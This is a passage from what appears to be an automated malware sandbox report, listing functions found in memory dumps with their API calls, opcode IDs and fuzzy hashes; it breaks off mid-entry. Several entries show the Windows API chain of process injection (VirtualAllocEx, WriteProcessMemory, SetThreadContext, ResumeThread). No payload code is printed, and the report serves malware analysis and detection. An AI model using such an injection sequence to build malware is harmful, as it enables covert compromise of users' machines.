Opcode Fuzzy Hash: 3ca8c442db253cedb958e4d48bb23542f711ca0fe7ffa6a31d29409499e57445
Instruction Fuzzy Hash: 3A419BB5D052589FCF00CFA9D984AEEFBF1BB49310F24902AE818B7210D374AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BB19E8, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04BB1AA5

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a978b836dedd74e46ec97a3df9588e44d604c0b87eebae3aa4c93bded3aa7bdb
Instruction ID: 02ec0257574968fefb883bd5aff1ea7443323c4b5dcda2fc8ac54bce75357063
Opcode Fuzzy Hash: a978b836dedd74e46ec97a3df9588e44d604c0b87eebae3aa4c93bded3aa7bdb
Instruction Fuzzy Hash: 8A41AAB5D04258DFCF10CFA9D984AEEFBB1BB09310F10906AE814B7210D375A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BB19F0, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04BB1AA5

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9857618669b6b81e17b5172cabfbd52766aa04bdda4c9335e2f7cb4170b6584b
Instruction ID: e50a3784da60ed9744d917842147dd0f5fd40d700c6c65718020592b0c25a06a
Opcode Fuzzy Hash: 9857618669b6b81e17b5172cabfbd52766aa04bdda4c9335e2f7cb4170b6584b
Instruction Fuzzy Hash: 714198B9D04258DFCF10CFA9D984AEEFBB1BB09310F10902AE814B7210D775A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1B09, Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04BB1BBD

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1887acdfc51a835f5b71f60c881549f2c47eff9f8f099d5356aa83cdf151a2cc
Instruction ID: dd9158ecba59b768ad4b3030d29b0e0f8ca8316197ce2528e7fd6581f1e169af
Opcode Fuzzy Hash: 1887acdfc51a835f5b71f60c881549f2c47eff9f8f099d5356aa83cdf151a2cc
Instruction Fuzzy Hash: BA3197B9D042589FCF10CFA9D984ADEFBB5BB09310F14905AE814BB310D775A906CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7F30, Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00BC7FDF

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6f8331e6f56f78591137dc6dfb8b16333837c7bd33458857d990c9eb0ab9bdcf
Instruction ID: f3693c7660d72afb8a312a32b715774d5741828773cf816197594de5f17c1b9d
Opcode Fuzzy Hash: 6f8331e6f56f78591137dc6dfb8b16333837c7bd33458857d990c9eb0ab9bdcf
Instruction Fuzzy Hash: EB31A8B5D042589FCF10CFA9E884AEEFBF0AB19310F24902AE815B7210D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1B10, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04BB1BBD

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 81f280132b8822b7965f890d72507c2fe5c2b839a0bc77d3c475d29c3acedf9b
Instruction ID: fd940b3096c8366d30bd48ad7a4d7d1a49270c668ed50634af53d66aca347a8a
Opcode Fuzzy Hash: 81f280132b8822b7965f890d72507c2fe5c2b839a0bc77d3c475d29c3acedf9b
Instruction Fuzzy Hash: D73176B9D042589FCF10CFA9D980ADEFBB5BB09310F14901AE814B7310D735A905CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7F38, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00BC7FDF

Memory Dump Source

Source File: 00000000.00000002.250491847.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 529e1e6cf60617332c6629e3cf11c7ed9bfac6cd491d41a66da769908cfbf492
Instruction ID: 9643e274e5521072c3bd0a35eac84a12d58e2126fa5a946b178b5728626f57bc
Opcode Fuzzy Hash: 529e1e6cf60617332c6629e3cf11c7ed9bfac6cd491d41a66da769908cfbf492
Instruction Fuzzy Hash: 923199B5D042589FCF10CFA9E984ADEFBF0BB19310F24902AE815B7210D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04BB18D0, Relevance: 1.6, APIs: 1, Instructions: 93threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 04BB198A

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 41c620f7921883a4bec46dea1bbc5e2f07e203a71be7eab5a7acb1e428e42a4d
Instruction ID: d70faf3b230572d4fa61a8a333658ccbec99f0f7c67d5f595e70fd27a2ab892f
Opcode Fuzzy Hash: 41c620f7921883a4bec46dea1bbc5e2f07e203a71be7eab5a7acb1e428e42a4d
Instruction Fuzzy Hash: 0741CBB4D012589FCB14CFA9D884AEEFBF1BB49314F24806AE459B7210D774AA46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04BB18D8, Relevance: 1.6, APIs: 1, Instructions: 90threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 04BB198A

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: fc5435101e0f5ca6657018b74ce71a9b33eeb2762228ce6ff8804fe3ca6cf94c
Instruction ID: 6bfde76b66647f4e2631e266a5a689076b1d2f7bdbd76b9c86dd18fdcfccbeee
Opcode Fuzzy Hash: fc5435101e0f5ca6657018b74ce71a9b33eeb2762228ce6ff8804fe3ca6cf94c
Instruction Fuzzy Hash: F531CBB4D012589FCB10CFA9D984AEEFBF0BB49314F24802AE458B7210D778AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04BB2118, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04BB21B3

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 970c61802b228a2573188b935fae35762931a50ab169df4d9f7f157168fdd606
Instruction ID: 7b398eeeeed01778bfd5cccb98921bed839e22225fcb545c002d69e718b38df2
Opcode Fuzzy Hash: 970c61802b228a2573188b935fae35762931a50ab169df4d9f7f157168fdd606
Instruction Fuzzy Hash: 9E3188B9D012089FCF10CFA9D984ADEFBF4AB49310F14905AE814BB310D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1D61, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 04BB1DE6

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9343ea930e4e41701bcba24be6cf469f9b1589bb1e14bb1c59fba42cbf51e597
Instruction ID: 058f2c3f5311de8de62c65c43d01bfc342dede69e7c1376ee16912ca3bdee805
Opcode Fuzzy Hash: 9343ea930e4e41701bcba24be6cf469f9b1589bb1e14bb1c59fba42cbf51e597
Instruction Fuzzy Hash: 7331CCB5D042089FCB10CFA9D884AEEFBF4EB49324F24905AE815B7310D775A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1D68, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 04BB1DE6

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 69a20b0d4b179cb74bf4c1c549db6e23ca727f979a06c7f070cd381906481f02
Instruction ID: 66188c46fbb93ba83c2ec0d6be8e5d8edb8884a74cd35dc8b071c3aefbc9f8f9
Opcode Fuzzy Hash: 69a20b0d4b179cb74bf4c1c549db6e23ca727f979a06c7f070cd381906481f02
Instruction Fuzzy Hash: 3021B9B5D042189FCB10CFA9D884AEEFBF4EB49320F24905AE818B7300D774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04BB1CB0, Relevance: 1.6, APIs: 1, Instructions: 64injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04BB1CF6

Memory Dump Source

Source File: 00000000.00000002.259589052.0000000004BB0000.00000040.00000001.sdmp, Offset: 04BB0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fca2b2353d0b1b7a2b967933db115e7efe7a7badae8dd620865014e7a000239b
Instruction ID: de1ba41e03b7d06259eeec9366a70bbecf60dfad5d49e24f540a651c27cdcb03
Opcode Fuzzy Hash: fca2b2353d0b1b7a2b967933db115e7efe7a7badae8dd620865014e7a000239b
Instruction Fuzzy Hash: AA11AA79D04258EFCF01CFD8E988AEDBBB1AB19314F24905AE854BB220C375AA45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0974C350, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43b194daffc92e74414e8a3562a89281c0131a4ed22fda20a4d5d3910241988
Instruction ID: b4f52359379f6ffe207115f38083c775b0b0e9a13c5f2621e72f1cd972c5d29a
Opcode Fuzzy Hash: f43b194daffc92e74414e8a3562a89281c0131a4ed22fda20a4d5d3910241988
Instruction Fuzzy Hash: 5E81F6397106108FCB15EF68D5989AD7BF6BF89B05B2581A9E502CB376DB71EC01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0974BE60, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95e99a5dcac6a9ccf8c5ebfd6c70f9be5eba1cd33aed43eb32795ef9906548b
Instruction ID: c2e1a734707525282810dc48b60baff58672603e4ea0d6a6ae72265e28be1fbb
Opcode Fuzzy Hash: c95e99a5dcac6a9ccf8c5ebfd6c70f9be5eba1cd33aed43eb32795ef9906548b
Instruction Fuzzy Hash: 57713D35B041148FCB15EBA8C9949EEB7F2EF89314B2540A9E505EB3A2DB35ED01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0974B648, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d37107316645057ebfa2980b74e9cf7c18541ea7fc0a3b32d3a96c639633f48
Instruction ID: 694a247005e0b431c251978662517f07a162916764923e204a93cc2f206aba86
Opcode Fuzzy Hash: 1d37107316645057ebfa2980b74e9cf7c18541ea7fc0a3b32d3a96c639633f48
Instruction Fuzzy Hash: DF61BF36A001158FCB12DFA5D4409EEBBB5EF88311F1080AAE909DB362DB35ED56CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0974B888, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59e14c10790600ba5bc41be8f30b380b059a5cf3f0cfa3084834db375e9a91be
Instruction ID: dfedb13e0e1f647adcf7ab5dca822e3abd08520dc0160f8dba0ccc2872a2a585
Opcode Fuzzy Hash: 59e14c10790600ba5bc41be8f30b380b059a5cf3f0cfa3084834db375e9a91be
Instruction Fuzzy Hash: 81516F33A00509DFCF00DF65D884AEEB7B6EF85315F158066E905AB262D775ED06CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0974D588, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b03cc6028e1bbc7916f43c852bf88246a8d8c28365bab53444d7a326e314eb3
Instruction ID: 1cd531b00b3bb266dff858082a114f1105b79238f3cd3ca7482135219d669684
Opcode Fuzzy Hash: 4b03cc6028e1bbc7916f43c852bf88246a8d8c28365bab53444d7a326e314eb3
Instruction Fuzzy Hash: 3561D475A00209DFCB14CFA9D989BDDB7F2BF48340F248169E805AB2A1DB71AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0974C750, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e09b22aba34a9cb1ee8e3216ff690b6ca86d105111bf573eba299cf33e22c5
Instruction ID: 02865da96582ee187c04ee2a9fded7072ec9f171133e6c889c2ab6074e6b232b
Opcode Fuzzy Hash: 36e09b22aba34a9cb1ee8e3216ff690b6ca86d105111bf573eba299cf33e22c5
Instruction Fuzzy Hash: CB418072E01628CFEF25AFB5D4543EE77B6EB88314F18542AD502B7381CB349885CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0974B260, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5639a87e722fdaf33754a9169d60e3e1bf6b6f674cf973b45217f90eba83d4b3
Instruction ID: 26e38bb9e35e59b477cf20f59a6095eabb68ac03b7febdfd90d544cb25f73fba
Opcode Fuzzy Hash: 5639a87e722fdaf33754a9169d60e3e1bf6b6f674cf973b45217f90eba83d4b3
Instruction Fuzzy Hash: 2B21B272B041119F8F658A3AC55892E33E6DF88A65725407EE10ADF3A5FF30DC06C711

Uniqueness

Uniqueness Score: -1.00%

Function 097401FF, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28e974a033c50b3773936c6c291227a2d467d1dbfe93d6f0e80c54643a2a447
Instruction ID: ceaeed438cffc40c526a96ee049871ac6a2bcb18bb455e4d619277bf441efea3
Opcode Fuzzy Hash: a28e974a033c50b3773936c6c291227a2d467d1dbfe93d6f0e80c54643a2a447
Instruction Fuzzy Hash: 3C410938914218CFD724AF68E998AADBBB1FF58311F1082E9D80AA7354DF351E85DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250099646.0000000000A7D000.00000040.00000001.sdmp, Offset: 00A7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22254a52ce138602e0ac199de524a3da92efb91aad5bd6c9744a43a6b2dd4e1c
Instruction ID: 9db8395b248194de65edc4634e31e5fd2f5a243f927d13d7c538077d0ee78ed6
Opcode Fuzzy Hash: 22254a52ce138602e0ac199de524a3da92efb91aad5bd6c9744a43a6b2dd4e1c
Instruction Fuzzy Hash: 0421FFB2504240EFCB05DF14D9C0B26BF75FF88728F24CA69E8095B246C336D846DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0974B404, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f7a063405ad1d73297d198d82a8ab7400ae5efbe5c2b55c8f1d34071b5d619
Instruction ID: a67c3a9adffa163eafcd073184bbeebe81b3f3b0b90c692d23cc9e0f645f0128
Opcode Fuzzy Hash: 24f7a063405ad1d73297d198d82a8ab7400ae5efbe5c2b55c8f1d34071b5d619
Instruction Fuzzy Hash: C1216D36B002149FCB24DE19D584A7A73BAFFC4720B10842EF98687792DB31F841CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250117926.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f404bd043affeb5a2e51bd97fd78bc37f953145e55673e502ed78ca7659b1a3
Instruction ID: baf3dde171274dc3774d4293e04f3defffdf599c5159991535f7639660471a6f
Opcode Fuzzy Hash: 3f404bd043affeb5a2e51bd97fd78bc37f953145e55673e502ed78ca7659b1a3
Instruction Fuzzy Hash: 7C21D071608240EFDB14EF54D9C4B26BB75FB88728F24C969D80A4B286C73AD846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250117926.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edcfe51eaefa1d1472406e8434d88720b3fb8d2a25146397729246287b6a0568
Instruction ID: 34199b5b0779b6ee96b8f71de499a2514b6819a99bc4c3652752bdbfff11ea24
Opcode Fuzzy Hash: edcfe51eaefa1d1472406e8434d88720b3fb8d2a25146397729246287b6a0568
Instruction Fuzzy Hash: 142104B1504240EFDB01EF54D9C0B66BBA5FB88724F24CA6DE8094B282D736D846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0974CA50, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3014a04972ecbe222d2af9521f837e74ec9e69cdbe0e584c497d961576a0742a
Instruction ID: d8201659b4c48ceb10b4d17493f0217f13bf4e75283d651e0d15d453021318ef
Opcode Fuzzy Hash: 3014a04972ecbe222d2af9521f837e74ec9e69cdbe0e584c497d961576a0742a
Instruction Fuzzy Hash: F821D172E10219EFCB05EFA0D8549DEBBB6FF89304F15862AE0017B220DF75A845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250117926.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda188506b685bc7dbaa54ed577c983bfd0af24b1bbd1548296b1127acf8a5cb
Instruction ID: 77b284bf62638075cf4da3040c11774ad77754429a6e0249e36280620bb37a18
Opcode Fuzzy Hash: dda188506b685bc7dbaa54ed577c983bfd0af24b1bbd1548296b1127acf8a5cb
Instruction Fuzzy Hash: 34219275408380DFCB02DF14D994B11BF71EB46314F28C5DAD8498F2A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0974DDB0, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edde169586608d0a018e381159344147a836d54d29f64644d2cd0916d55e978
Instruction ID: 0891ebb05e15aafa054cdc88cb9428701a1871ce0d3df7bde818ae38b7749575
Opcode Fuzzy Hash: 6edde169586608d0a018e381159344147a836d54d29f64644d2cd0916d55e978
Instruction Fuzzy Hash: CB21CC71E0020A9FCB04DFADC9448AFFBF9FF99210B10C55AE519E7215E770A956CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250099646.0000000000A7D000.00000040.00000001.sdmp, Offset: 00A7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a060fbae60cfec1215d68a907ab3b47ae3c6c5111b04881ddb3d72143ace79
Instruction ID: d479bf0f1e756e0be2e852b0d58a6ff3f1ae50235ac1b8f8bcb802006cc7244c
Opcode Fuzzy Hash: 71a060fbae60cfec1215d68a907ab3b47ae3c6c5111b04881ddb3d72143ace79
Instruction Fuzzy Hash: 6111AF76504280CFCB11CF14D9C4B16BF71FB94324F28C6A9D8494B656C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A8D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250117926.0000000000A8D000.00000040.00000001.sdmp, Offset: 00A8D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e140a8a7950bf51ebf11ffa23f115df2679bf2d04b3548f20c996f871ac3cc8e
Instruction ID: c606f75b8d1491c0b67be1a6019418956a7f813559787983122d9adde15b432d
Opcode Fuzzy Hash: e140a8a7950bf51ebf11ffa23f115df2679bf2d04b3548f20c996f871ac3cc8e
Instruction Fuzzy Hash: 2811DD75504280DFCB01DF14C5C0B55FBB1FB84324F28C6ADD8494B696C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0974DEE0, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87240fe3b5feaf426472930b1ca58b5ed0d56a83d4958dd71eee2c10347dc9af
Instruction ID: a11e574afff21b675d8ba12b65ce102d079986ee5ef2fd0536d43da275ea0869
Opcode Fuzzy Hash: 87240fe3b5feaf426472930b1ca58b5ed0d56a83d4958dd71eee2c10347dc9af
Instruction Fuzzy Hash: D201D6327046008BCB38AA25C821A2A73D69FC1614B65C47DE459CB796DF71EC06C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250099646.0000000000A7D000.00000040.00000001.sdmp, Offset: 00A7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c532cdba14f06075329e37cb1fbef9453d50f16fae532529248a2ec90e83f4
Instruction ID: df89b0798b725894d06d1c5279468371f01416bf78f02ab1adb58cbe7ac33256
Opcode Fuzzy Hash: 25c532cdba14f06075329e37cb1fbef9453d50f16fae532529248a2ec90e83f4
Instruction Fuzzy Hash: 2F01F7714087449AE7144F25CD84B67BBB8DF41774F28C55EE90C5F242DB789844C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0974DE58, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cfe8f8273630dd3d3bb5f3c02f2e66336fa25d2668d291024e1d83d67712981
Instruction ID: a6ea2ca30d5a63f5f0e6e2d6450397b169f92255fea9122a3e38b83a32f0d964
Opcode Fuzzy Hash: 5cfe8f8273630dd3d3bb5f3c02f2e66336fa25d2668d291024e1d83d67712981
Instruction Fuzzy Hash: B10181323006108FCB24DB19C855926B3EAEF85A14B16C97EE549C77A6DF71FC06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0974FC40, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49398d554efcb371278277ac8690710f11c8d6934f8bc2e4c60c6a7beeffdced
Instruction ID: bb1a4dd86487eef291d0d027899b8fffb9059e5b7e2ad1f2ea6a3123eb4e51ce
Opcode Fuzzy Hash: 49398d554efcb371278277ac8690710f11c8d6934f8bc2e4c60c6a7beeffdced
Instruction Fuzzy Hash: A30181313046018FC724DB19C855D26B3EAAF86724B21C87EE909CB765DF71EC06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0974D4D8, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eef1b2b268fbe638f57132d56ab4a78c99d907eef094527cc6ae95b630e7478
Instruction ID: e2e295ca09d2d1665d93787b61202ebe2d9df8d6d174557044813d8260d2395c
Opcode Fuzzy Hash: 6eef1b2b268fbe638f57132d56ab4a78c99d907eef094527cc6ae95b630e7478
Instruction Fuzzy Hash: AF011EB5E00119DFCB10EF98D444AAEF7B1BF49314F20805AD815E7351DB34AA01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.250099646.0000000000A7D000.00000040.00000001.sdmp, Offset: 00A7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73941d40a49bac9d8acfc67414b4412172826ba4a18cb0aaac3bfa483dafccd
Instruction ID: 147aa10fdceb9de0357491fb23adc200e5d241ab0277eb6194bf2e05cd5aa184
Opcode Fuzzy Hash: a73941d40a49bac9d8acfc67414b4412172826ba4a18cb0aaac3bfa483dafccd
Instruction Fuzzy Hash: D3F062714052449AEB148F19DDC4B63FBA8EF91734F28C55AED085F286C7799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0974B414, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b55b008537d664560da842ef4a34e5d8c939279421413e6e8bb548c977e2970
Instruction ID: eed2fb7c82ece6bc2c0edaad54d616a36c3f6b1b5d2e6c3f1e8a0562b6835c22
Opcode Fuzzy Hash: 7b55b008537d664560da842ef4a34e5d8c939279421413e6e8bb548c977e2970
Instruction Fuzzy Hash: E6F01D72A1411A8FDB60DFB9C8457ADBBF0FB04305F1489B6E418D7291EB38EA159B81

Uniqueness

Uniqueness Score: -1.00%

Function 097448C1, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330f60c8532be1b8eb77b77f72a57d60b9b6a99d0c89d0660d9406ee60c5bfd7
Instruction ID: 6730fb35a428b0bbfc8a48c2f82c4644d467f77afd7fa12b718932b56b39a705
Opcode Fuzzy Hash: 330f60c8532be1b8eb77b77f72a57d60b9b6a99d0c89d0660d9406ee60c5bfd7
Instruction Fuzzy Hash: 9D010530D0035A8FDB20DB68CA446E9B7B1EF99341F1081E6D50AB7650EB716E81EF40

Uniqueness

Uniqueness Score: -1.00%

Function 0974AFD0, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4acd39e4fb324f0e1ce1a10ad6bfd953f6832bfa796ea769cb9ebaac9a342fb5
Instruction ID: 3ec1e31c642d08b404739858021871cba0d8d42f2b202c41d9c86f4e45751eec
Opcode Fuzzy Hash: 4acd39e4fb324f0e1ce1a10ad6bfd953f6832bfa796ea769cb9ebaac9a342fb5
Instruction Fuzzy Hash: DCF0F431E006028BD71CCF6CE54261ABBE1FB05311B1109A6E024CF242D721E8C4CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0974DFD8, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.264125899.0000000009740000.00000040.00000001.sdmp, Offset: 09740000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d612d4cb9200c54b95b45d342582a05d69afe66ed387adea979eec97f44047da
